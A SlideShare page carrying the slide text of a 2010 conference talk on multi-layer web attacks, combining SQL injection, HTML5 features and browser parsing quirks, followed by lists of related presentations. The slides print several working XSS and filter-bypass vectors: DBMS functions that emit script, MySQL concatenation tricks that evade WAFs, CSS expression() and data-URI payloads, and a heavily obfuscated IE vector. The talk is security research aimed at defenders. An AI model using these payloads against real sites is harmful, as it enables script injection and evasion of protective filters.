SlideShare ist ein Scribd-Unternehmen logo

Future of Web Attacks: Multi-Layer Attacks, XSSQLI+ and HTML5

Mario Heiderich
Mario Heiderich

This document discusses current and emerging web attacks. It notes that while cross-site scripting (XSS) and SQL injection attacks were once prevalent, modern web applications and browsers incorporate defenses against these attacks. However, the document argues that web applications and browsers are evolving in ways that enable new types of multi-layer attacks. Examples are provided of attacks that combine layers like the database management system, JavaScript execution in browsers, and HTML parsing quirks to bypass defenses. The document urges security researchers and practitioners to consider these evolving attack techniques and the growing diversity of client devices and applications.

Technologie
1 von 36
Downloaden Sie, um offline zu lesen
The Presence and Future of Web Attacks Multi-Layer Attacks, XSSQLI+ and HTML5 A presentation by Mario Heiderich for CONFidence 2010, Krakow
WARNING This talk will be technical, chaotic and|or hurt
Intro Mario Heiderich @0x6D6172696F  Based in Cologne  CTO for Business IN Inc - working on workube.com  Independent Security Researcher  PHPIDS and something we will see later on
Why this talk?  What happened to web application security?  Always the same... so 2002 right?  XSS, SQL Injections, Auth and path traversal  We have amazing things now!  NoScript, the IE8 and Chromium XSS filter and CSP  Users must be safer than ever!  But didn't the web change?  Wasn't there HTML5 and next generation browsers?
Oh wait - developers!  Web app development frameworks help  Building applications faster  Pre-implemented SQLI and XSS protection  Secure forms with complex CSRF tokens  Webroot contains webroot only files  Weaknesses regarding JavaScript generation  Client side logic mostly built manually  Different templates for browsers, mobile devices, feeds  Offline mode, client side validation, DOM access
User Agents on steroids  Chrome 5 and Opera 10.5 ship client side databases  IE9 is coming soon with more standards conformity  Integrated security mechanisms  The death of eval()  A fat client dynasty is coming up  Who needs a server anyway if clients do all the work  And store their data in „the cloud“   Bye bye SQL - say hello to NoSQL?
Web applications are changing  And so are the attacks against them  If the attack happens on and against the client  Of what use will a server side IDS / WAF solution be?  Today we can have a little preview for that scenario  One question might be...  How will protective mechanisms react on multi-layer attacks?
Multi-layer what?  What about utilizing the DBMS to generate an XSS attack  NoScript detects most XSS attacks without problems  Circumvention has become very difficult  Thanks to Giorgio Maone and the NoScript user base. And me :P  Let's have a look at my last one (disclosed via SSD - fixed in 1.9.9.48)  Aren't dataURIs the sweetest thing?  <a href="d&#097t&#x0061: . &#x2c &#x25;  3  c s cri &#x00D; pt % 3 e alu0065rt(1)%3c  /s &#x43 RI &#x009 P t>"
Difficult!  We can probably agree that it's not as easy anymore  Same thing for the IE8 XSS filter  Or implementations of toStaticHTML()  Most quirky JavaScript encoding techniques are documented  Not too many user agent specific surprises anymore    Help from another layer would be appreciated  Let's have a look at a "classic webapp" example
Imagine the DBMS helps  Hypothesis  A verbose SQL Injection vulnerability is always at least an "unfilterable" XSS  Verification  Just make use of the obfuscation possibilities the DBMS provides  SELECT 0x3C7363726970743E616C6572742831293C2F7363726970743E  SELECT UpdateXML(concat( 0x3c,'script',0x3e,'alert(1)',0x3c,'/ script',0x3e), '/x', 0);  SELECT/**/'<sc'"rip"'t>al'"er"'t(1)'"</sc"'ript>'
MySQL and PostgreSQL  MySQL only ships two basic XML functions  UpdateXML() and ExtractValue()  PostgreSQL has far more advanced XML support  SELECT xmlelement(name img,xmlattributes(1 as src,'alert(1)'as onerror))  SELECT xmlforest(loWER('x41'||'lert(1)') AS script);  And my favorite  SELECT xpath('//text()', '<x:x>&#x3c;imgx20src=x onerror=alert(1);&#x2f;&#x2f;</x:x>', ARRAY[ARRAY['x', '']]);
SQL Injection and XSS  There are more intersections for XSS and SQLI  „Remember“ the client side databases?  And the short lived Google Gears?  HTML5 and W3C Offline Web Applications 1.0 give us window.openDatabase()  SQL execution on the user agent  Currently supported by Chrome and Opera  Usually implemented using SQLite
Code please <script type="text/javascript"> openDatabase('',1,1,0).transaction(function($){ $.executeSql( 'SELECT "x61lert(1u0029"', [], function($,results){ for(i in results.rows.item(0)) eval(results.rows.item(0)[i]) }) }) </script>  Selects the string "alert(1)"  And evaluates the result
Short Roundup  The browsers speak SQL now  The server side DBMS can generate HTML and JavaScript  We already outsmarted NoScript and IE8 XSS filter  Not really a fair game though  Multi-layer attacks mean multi-layer obfuscation  In future webapps the client side DBMS will generate our XSS payload     But today we still have to trick the server side protection  Bypass IDS and WAF with a trigger
Attackers like obfuscation  And why wouldn't they - right?  Obfuscation usually means concatenation  And a bit of encoding spice  But how to concatenate in SQL so no one will notice the attack?  Which operator to choose?  Everybody knows chr(), char() and double-pipe...
In MySQL - none at all  MySQL doesn't need parenthesis to concatenate  And doesn't know the double-pipe operator  Sorry mod_security...  But luckily MySQL accepts concatenation via whitespace  SELECT "a" "d" "m" "i" "n"  SELECT'a'"d"'m'"i"'n'  Or why not use an integer overflow in char()  SELECT concat( char( x'70617373', b'1110111011011110111001001100100'))
So again...  We can bypass the server side protection mechanisms  As well as client side tools  No parenthesis or special operators needed on MySQL  We can also trick MySQL and the IDS with MySQL specific code  SELECT--/*!500005,*//*!400004,*//*!300003,*/
Back to the user agent  But what if no server side DBMS is involved in the attack  What if the client side database is being targeted  We still need to execute some JavaScript bypassing either server side IDS and the client side security mechanisms  Let's have a look at some freaky examples
Remember dataURIs?  The whole requested resource embedded in the URI  DataURIs work smoothly on Firefox, Opera and Chrome  But IE8 and 9 have problems  Some say the minimal dataURI support was just for ACID 2
People say...  ...it's not possible to execute JavaScript via dataURI on IE  Do we agree on that?  No we don't!  <style> @import "data:,*%7bx:expression(write(2))%7D"; </style>  <link rel="Stylesheet" href="data:,* %7bx:expression(write(4))%7d">
And there's more  CSS expression() is believed to be dead on IE8  But it isn't  It's only disabled in standard mode  In case a recognized DOCTYPE is present  The new HTML5 doctype isn't  So this works: <!docytpe html> <div style="background:url('abc', x!=x=expression(write(2));)">
And even worse...  HTML5 forces user agents to be more tolerant again  New tags, new attributes, new parsing rules  And tons of new features like the mentioned openDatabase()  Some nifty examples from the future  <video/poster=javascript:alert(1)// Opera 10.5+  <style>@import javascript:alert(1); // IE9 (!)
Closing tags + free 0day  Another weird artifact has been reported for IE6 some years ago  It's attributes in closing HTML tags  Believed to be dead... but  This still works on all IEs  <td>phoobar</td style=expression(write(1))>  And what about this?  <style>*{background:url(foo!!- =expression(write(1));</style>
Opera CSS XSS  Since Mozilla fixed the dataURI and cross domain problems with -moz-binding IE was believed to be unique  Unique regarding JavaScript execution via CSS  But Opera ships an artifact too  <style>*{-o-link:'javascript:alert(1)';-o-link- source:current}</style>
Now we have...  Server side SQL helping to circumvent client side XSS filters  Effective SQL obfuscation circumventing WAF and IDS  "Obfuscation-mash ups" using several layers  Quirky HTML triggers to execute the JS  Sounds like only one player is missing  Even more freaky markup obfuscation! Awesome! Now breathe..
Meet Harold the markup ghoul This is Harold: 1;--<?f><l ₩ :!!:x /style=`b&#x5c;65h0061vIor/ĸ :url(#def&#x61ult#time2)ö/';'` ₩ /onb egin= &#x5bµ=u00&#054;1le&#114t&#40&#x31)&# x5d&#x2f/&#xyŧ>  It's completely legitimate to call me a mad man now and say this is never gonna work  So - demo time: http://heideri.ch/jso/what???
What... what is this?  It's a piece of markup – obfuscated to the max  Working on IE only – but all versions from 5 to 9  Based on the HTML+TIME API (What? Stuff like that still exists?)  Does your WAF know what to do with it?  Overall about 12-13 obfuscation steps  Buy me a beer later on and I will give you a full explanation :D
Round Up  We are not living in web app = CRUD application times anymore  Modern webapps accept input from many channels  User input via HTTP is just one of them  API calls, RPC, DOM, Drag&Drop, file meta data & EXIF...  WAF/IDS as well as pentesters need to look into HTML5  New application structures and design pattern must be understood  Client and server versus rich-client and cloud  SQLite and NVP versus RDBMS  Massive client diversity via mobile devices
Expectations and tasks  Fewer basic and reflective XSS  More out-of-band attacks and heavy obfuscation  We didn't even cover Flash and PDF  More JSON and E4X hijacking  SVG based attacks and rogue multimedia objects  Don't ignore the user agent  Understand client side obfuscation and multi-layer obfuscation  Don't trust filters. Ever.  We broke HTMLPurifier and most other markup filters some days ago with one single vector  And don't trust the cloud – it's a business model and not your buddy :D
So what can I do?  Help with research and participation!  Communication and disclosure  For good!  But how?
The Ultimate Cheatsheet  http://heideri.ch/jso
Ping us!  Add new vectors  Get a channel to speak to vendors  Most are more responsive than one might think  Use it for..  Your own scanner software  Your own local version  Whatever you want!  Open API in JSON  Multiple languages  Flexible payload  You need more? Tell us!
Do what now?  Go here!  http://code.google.com/p/html5security/
Questions & Comments  Thanks very much for listening!  Wait - no goodies this time? Meh!!1
Yaaaaaaay! Goodies!  Did you know Firefox has a DOM object called crypto?  PKI meets JavaScript  And another eval() for free!  crypto.generateCRMFRequest( 'CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use' );
Good bye!

Empfohlen

The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0Mario Heiderich
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
 
A XSSmas carol
A XSSmas carolA XSSmas carol
A XSSmas carolcgvwzq
 
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesMario Heiderich
 
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Mario Heiderich
 

Empfohlen

The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0Mario Heiderich
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
 
A XSSmas carol
A XSSmas carolA XSSmas carol
A XSSmas carolcgvwzq
 
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesMario Heiderich
 
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Mario Heiderich
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Mario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyMario Heiderich
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009Mario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF qualssnyff
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railssnyff
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT - Multimediatreff
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Yury Chemerkin
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningzulla
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Krzysztof Kotowicz
 
Developer's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web CryptographyDeveloper's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web CryptographyKevin Hakanson
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!Soroush Dalili
 
I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!Mario Heiderich
 
How to get free Wi-Fi in a whole City
How to get free Wi-Fi in a whole CityHow to get free Wi-Fi in a whole City
How to get free Wi-Fi in a whole CityYurii Bilyk
 

Weitere ähnliche Inhalte

Was ist angesagt?

Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Mario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyMario Heiderich
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009Mario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF qualssnyff
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railssnyff
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT - Multimediatreff
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Yury Chemerkin
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningzulla
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Krzysztof Kotowicz
 
Developer's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web CryptographyDeveloper's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web CryptographyKevin Hakanson
 

Was ist angesagt? (20)

Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the Ugly
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJS
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit Creation
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF quals
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to rails
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanning
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
 
Developer's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web CryptographyDeveloper's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web Cryptography
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
 

Andere mochten auch

I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!Mario Heiderich
 
How to get free Wi-Fi in a whole City
How to get free Wi-Fi in a whole CityHow to get free Wi-Fi in a whole City
How to get free Wi-Fi in a whole CityYurii Bilyk
 
How-to crack 43kk passwords while drinking your juice/smoozie in the Hood
How-to crack 43kk passwords while drinking your juice/smoozie in the HoodHow-to crack 43kk passwords while drinking your juice/smoozie in the Hood
How-to crack 43kk passwords while drinking your juice/smoozie in the HoodYurii Bilyk
 
OWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP HackathonOWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP HackathonSimon Bennetts
 
Alert logic anatomy owasp infographic
Alert logic anatomy owasp infographicAlert logic anatomy owasp infographic
Alert logic anatomy owasp infographicCMR WORLD TECH
 
Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application VulnerabilitiesPreetish Panda
 
Anatomy of an Attack
Anatomy of an AttackAnatomy of an Attack
Anatomy of an Attackspoofyroot
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Matt Johansen
 
BlackHat 2014 OWASP ZAP Turbo Talk
BlackHat 2014 OWASP ZAP Turbo TalkBlackHat 2014 OWASP ZAP Turbo Talk
BlackHat 2014 OWASP ZAP Turbo TalkSimon Bennetts
 
Using the Zed Attack Proxy as a Web App testing tool
Using the Zed Attack Proxy as a Web App testing toolUsing the Zed Attack Proxy as a Web App testing tool
Using the Zed Attack Proxy as a Web App testing toolDavid Sweigert
 
Top Ten Web Attacks
Top Ten Web Attacks Top Ten Web Attacks
Top Ten Web Attacks Ajay Ohri
 
2014 ZAP Workshop 2: Contexts and Fuzzing
2014 ZAP Workshop 2: Contexts and Fuzzing2014 ZAP Workshop 2: Contexts and Fuzzing
2014 ZAP Workshop 2: Contexts and FuzzingSimon Bennetts
 
2014 ZAP Workshop 1: Getting Started
2014 ZAP Workshop 1: Getting Started2014 ZAP Workshop 1: Getting Started
2014 ZAP Workshop 1: Getting StartedSimon Bennetts
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseShreeraj Shah
 
cmd injection
cmd injectioncmd injection
cmd injectionhackstuff
 
Web application attack Presentation
Web application attack PresentationWeb application attack Presentation
Web application attack PresentationKhoa Nguyen
 

Andere mochten auch (20)

I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!
 
How to get free Wi-Fi in a whole City
How to get free Wi-Fi in a whole CityHow to get free Wi-Fi in a whole City
How to get free Wi-Fi in a whole City
 
How-to crack 43kk passwords while drinking your juice/smoozie in the Hood
How-to crack 43kk passwords while drinking your juice/smoozie in the HoodHow-to crack 43kk passwords while drinking your juice/smoozie in the Hood
How-to crack 43kk passwords while drinking your juice/smoozie in the Hood
 
OWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP HackathonOWASP 2013 APPSEC USA ZAP Hackathon
OWASP 2013 APPSEC USA ZAP Hackathon
 
Ddos dos
Ddos dosDdos dos
Ddos dos
 
Alert logic anatomy owasp infographic
Alert logic anatomy owasp infographicAlert logic anatomy owasp infographic
Alert logic anatomy owasp infographic
 
Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application Vulnerabilities
 
Anatomy of an Attack
Anatomy of an AttackAnatomy of an Attack
Anatomy of an Attack
 
Web attacks
Web attacksWeb attacks
Web attacks
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
 
BlackHat 2014 OWASP ZAP Turbo Talk
BlackHat 2014 OWASP ZAP Turbo TalkBlackHat 2014 OWASP ZAP Turbo Talk
BlackHat 2014 OWASP ZAP Turbo Talk
 
Using the Zed Attack Proxy as a Web App testing tool
Using the Zed Attack Proxy as a Web App testing toolUsing the Zed Attack Proxy as a Web App testing tool
Using the Zed Attack Proxy as a Web App testing tool
 
Top Ten Web Attacks
Top Ten Web Attacks Top Ten Web Attacks
Top Ten Web Attacks
 
2014 ZAP Workshop 2: Contexts and Fuzzing
2014 ZAP Workshop 2: Contexts and Fuzzing2014 ZAP Workshop 2: Contexts and Fuzzing
2014 ZAP Workshop 2: Contexts and Fuzzing
 
2014 ZAP Workshop 1: Getting Started
2014 ZAP Workshop 1: Getting Started2014 ZAP Workshop 1: Getting Started
2014 ZAP Workshop 1: Getting Started
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
 
Presentation on Web Attacks
Presentation on Web AttacksPresentation on Web Attacks
Presentation on Web Attacks
 
cmd injection
cmd injectioncmd injection
cmd injection
 
Web application attack Presentation
Web application attack PresentationWeb application attack Presentation
Web application attack Presentation
 

Ähnlich wie Future of Web Attacks: Multi-Layer Attacks, XSSQLI+ and HTML5

Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysqqlan
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfGiorgiRcheulishvili
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Stephan Chenette
 
2 Roads to Redemption - Thoughts on XSS and SQLIA
